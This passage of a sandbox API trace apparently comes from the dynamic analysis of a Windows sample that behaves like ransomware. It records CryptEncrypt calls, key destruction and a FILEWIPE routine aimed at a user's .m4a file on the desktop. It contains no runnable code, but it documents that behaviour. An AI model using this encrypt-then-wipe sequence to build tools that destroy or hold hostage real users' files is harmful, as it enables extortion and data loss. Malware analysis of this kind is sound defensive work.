dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0031.702] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0031.702] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.702] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.702] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0031.702] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.702] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0031.702] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.702] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.702] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.702] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0031.702] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.702] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0031.703] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.704] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.704] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x42e1, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x42f0) returned 1 [0031.704] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.704] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0031.704] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.704] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.704] CharLowerBuffW (in: lpsz="byte[17137]", cchLength=0xb | out: lpsz="byte[17137]") returned 0xb [0031.704] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.706] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.706] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.706] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.706] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.706] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x88ffb0*, pdwDataLen=0x6ae220*=0x42e1, dwBufLen=0x42f0 | out: pbData=0x88ffb0*, pdwDataLen=0x6ae220*=0x42f0) returned 1 [0031.707] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.707] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0031.707] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.708] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.708] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.708] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.708] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0031.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.708] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.709] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.709] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.709] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0031.709] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.709] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.709] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0031.709] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.709] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0031.709] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.712] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.712] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.712] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.714] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.714] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.714] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0031.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.715] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.715] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.715] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0031.715] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.715] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0031.715] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.715] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.715] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0031.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.715] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.715] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.715] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0031.715] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0031.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0031.715] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.715] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.716] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0031.716] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0031.716] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.716] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.716] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.716] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.716] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0031.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.716] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.716] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.716] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.716] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0031.716] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.716] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0031.716] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0031.716] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.716] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0031.716] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0031.717] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0031.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0031.717] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0031.717] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.717] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0031.717] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.717] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.717] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0031.717] FreeLibrary (hLibModule=0x754b0000) returned 1 [0031.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0031.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0031.717] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0031.717] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0031.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0031.717] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.717] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.717] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.718] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.718] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0031.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0031.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.718] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.718] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.718] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d88b1e0, ftCreationTime.dwHighDateTime=0x1d5be72, ftLastAccessTime.dwLowDateTime=0x7e10b2e0, ftLastAccessTime.dwHighDateTime=0x1d5c4a1, ftLastWriteTime.dwLowDateTime=0x7e10b2e0, ftLastWriteTime.dwHighDateTime=0x1d5c4a1, nFileSizeHigh=0x0, nFileSizeLow=0x42e1, dwReserved0=0x0, dwReserved1=0x777648, cFileName="yRQDF_aSfhekn.m4a", cAlternateFileName="YRQDF_~1.M4A")) returned 0x7c2240 [0031.719] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0031.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0031.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0031.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.719] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.719] CharLowerBuffW (in: lpsz="byte[17121]", cchLength=0xb | out: lpsz="byte[17121]") returned 0xb [0031.719] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.719] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0031.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0031.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.719] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.719] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0031.719] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0031.719] FreeLibrary (hLibModule=0x76b40000) returned 1 [0031.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0031.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0031.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0031.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0031.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0031.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0031.719] HeapFree (in: hHeap=0x770000, 